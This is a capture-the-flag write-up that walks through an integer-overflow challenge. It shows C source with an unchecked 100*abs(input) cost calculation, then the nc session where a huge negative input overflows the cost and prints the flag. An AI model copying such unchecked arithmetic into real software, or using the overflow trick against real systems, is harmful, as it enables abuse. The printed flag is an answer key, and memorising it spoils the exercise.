Flag Integer Overflow

We are given a c source code file Lets open it up and take a look at it

/*
Compile options:
    gcc flag-overflow.c -o flag-overflow
*/

#include <stdio.h>
#include <stdlib.h>

void print_flag()
{
    puts("\nCongrats! You have obtained the flag.");
    system("cat flag");
}

int main()
{
    int balance = 1000;
    int input;
    int cost = 0;

    puts("Goal: Make your balance greater than $13371337");
    printf("Current balance: $%d\n",balance);
    puts("\nHow many flags would you like to buy? Cost of 1 flag is $100.");

    scanf("%d", &input);
    cost = 100*abs(input);

    if (cost <= balance) {
        balance -= cost;
        printf("You bought %d flags. Cost is $%d.\n",input,cost);
        printf("New balance: $%d\n",balance);
    }
    else {
        printf("Insufficient funds to pay the cost of $%d\n",cost);
    }

    if (balance >= 13371337) {
        print_flag();
    }

    return 0;
}

from the c file, we can see that the cost is calculated by

cost = 100*abs(input);

which means that we cannot cheese the program by inputting negative numbers like -1

but what happens when we enter a very big negative number instead (e.g -999999999999999)?

└─# nc challs.sieberr.live 1001
Goal: Make your balance greater than $13371337
Current balance: $1000

How many flags would you like to buy? Cost of 1 flag is $100.
-999999999999999
You bought 1530494977 flags. Cost is $-1569324956.
New balance: $1569325956

Congrats! You have obtained the flag.
sctf{b1g_numb3r5_sm4ll_numb3r5}

flag:

sctf{b1g_numb3r5_sm4ll_numb3r5}

PreviousIntroduction to pwntools NextCasino

Last updated 1 year ago